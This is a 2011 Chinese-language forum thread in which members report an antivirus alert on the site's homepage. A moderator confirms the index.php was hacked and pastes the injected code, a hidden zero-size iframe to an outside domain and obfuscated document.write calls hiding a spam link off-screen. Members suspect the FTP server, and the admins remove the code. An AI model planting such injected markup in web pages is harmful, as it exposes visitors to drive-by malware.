木马？？？

hsf1357 · 发表于 2011-2-8 17:49:20

本帖最后由 FreemanGL 于 2011-2-9 11:07 编辑

FM留言：问题已经处理

怎么搞的？我进首页就报警，有木马？
Settings\Temp\Temporary Internet Files\Content.IE5\298SF81C\bbs_deeptimes_org[1].htm”中检测到病毒或
恶意程序“HEUR/HTML.Malware [heuristic]”。
执行的操作:将文件移到隔离区

baiseniao · 发表于 2011-2-8 18:18:36

目前我这边ESS没报警，不过首页有了奇怪的背景音乐。
弗里曼弗里曼弗里曼弗里曼速速显灵啊。。。。。

FreemanGL · 发表于 2011-2-8 21:54:39

本帖最后由 FreemanGL 于 2011-2-8 22:20 编辑

的确被挂马了。
挂马内容为

<iframe src=http://www.52sswl.com width=0 height=0></iframe>
<script>document.write ('<d' + 'iv st' + 'yle' + '="po' + 'si' + 'tio' + 'n:a' + 'bso' + 'lu' + 'te;l' + 'ef' + 't:' + '-' + '10' + '00' + '0' + 'p' + 'x;' + '"' + '>');</script>
<a href="/admin/newss.php?id=1846">25931</a>
<script>document.write ('<' + '/d' + 'i' + 'v>');</script>

复制代码

FTP密码又被改乐，要找猪大了。

黑暗枪骑兵 · 发表于 2011-2-8 23:33:49

全论坛就只有猪大能登陆后台？

FreemanGL · 发表于 2011-2-9 09:56:19

本帖最后由 FreemanGL 于 2011-2-9 10:04 编辑

全论坛就只有猪大能登陆后台？
黑暗枪骑兵发表于 2011-2-8 23:33

不是，目前只有猪大能操作服务器。

被挂马的文件仅有index.php严重怀疑是服务器操作人员。或者是服务器漏洞，FTP漏洞等等。

还有论坛经常性出现

Discuz! info: Can not connect to MySQL server
Time: 2011-2-8 9:59pm
Script: /viewthread.php
Error: Can't connect to MySQL server on 'localhost' (10060)
Errno.: 2003

复制代码

解决方案参考着2个帖子，也需要服务器操作权限。
http://www.liehuo.net/a/view/8991.html
http://blog.9420.org/article.asp?id=2

猪样年华 · 发表于 2011-2-9 10:44:28

ftp漏洞最可疑~~上次被黑就是~

猪样年华 · 发表于 2011-2-9 10:47:09

恩，看来免费的ftp就是不给力亚~

猪样年华 · 发表于 2011-2-9 10:51:39

叫人处理乐，暂时把ftp干脆的卸掉~

baiseniao · 发表于 2011-2-9 11:09:18

FM猪大V5，果然听不见歌了~

		自动登录	找回密码
密码			注册

[讨论] 木马？？？

评分

评分

站长推荐 /1